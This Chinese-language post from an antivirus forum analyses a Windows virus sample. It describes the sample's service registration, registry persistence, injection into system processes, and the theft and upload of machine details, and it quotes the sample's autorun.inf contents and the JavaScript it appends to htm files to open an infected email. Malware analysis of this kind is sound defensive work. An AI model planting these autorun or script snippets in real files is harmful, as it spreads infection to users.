pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析
该样本程序被执行后,遍历当前进程查看是否存在“AVP.EXE”,若存在则修改系统时间,试图使其监控失效;拷贝自身到%SystemRoot%\system32目录下重新命名为“24B3A460.EXE”,在同一目录下释放文件“runouce.exe”和动态链接库“331D1210.DLL”,修改文件“runouce.exe”属性为“只读”、“隐藏”;将病毒拷贝“24B3A460.EXE”注册成名为“1B7DC3E0”的服务并启动。
| Quote: | 项:HKLM\SYSTEM\ControlSet001\Services\1B7DC3E0\
键值:DisplayName
指向数据:1B7DC3E0
项:HKLM\SYSTEM\ControlSet001\Services\1B7DC3E0\
键值:ImagePath
指向数据:C:\WINDOWS\system32\24B3A460.EXE -k
项:HKLM\SYSTEM\ControlSet001\Services\1B7DC3E0\
键值:Description
指向数据:331D1210
项:HKLM\SYSTEM\ControlSet001\Services\1B7DC3E0\
键值:Start
指向数据:02 |
|
修改如下注册表使得文件“runouce.exe”开机自启动,后通过批处理执行自删除。
| Quote: | 项:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
健值:Runonce
指向数据:C:\WINDOWS\system32\runouce.exe |
|
病毒主程序“24B3A460.EXE”运行后,开启多个线程执行如下操作:
查找进程“winlogon.exe”,“explorer.exe”,“services.exe”,“svchost.exe”,“lsass.exe”以及“conime.exe”等系统关键进程,申请内存空间将动态链接库文件“331D1210.DLL”写入,开启远程线程,后台启动IE联网将用户的“MAC地址”,“所中病毒版本号”以及“计算机名”等信息发送给盗号者并比对当前病毒版本是否为最新,如果不是则下载病毒最新版至本地执行,同时访问广告网站为其刷流量。
修改如下注册表键值是隐藏文件不能够正常显示:
| Quote: | 项:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
键值:CheckedValue: 0x00000000(原值为0x00000001) |
|
枚举盘符在各分区和移动存储介质中释放隐藏病毒文件“auto.exe”和“autorun.inf”,其中autorun.inf文件内容如下:
| Quote: | [AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe |
|
文件“runouce.exe”运行后,查找IE安装路径找到“IEXPLORE.EXE”并感染,遍历磁盘中文件扩展名为“htm”的文件,在其末尾写入以下代码,并在其所在文件夹下释放带毒邮件readme.eml,借邮件传播病毒
| Quote: | <html>
<script language="JavaScript">
window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script>
</html> |
|
遍历目录感染用户所有可执行文件向其中写入病毒代码,使用Armadillo v4.x压缩并以此作为判断是否被感染的标志。
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
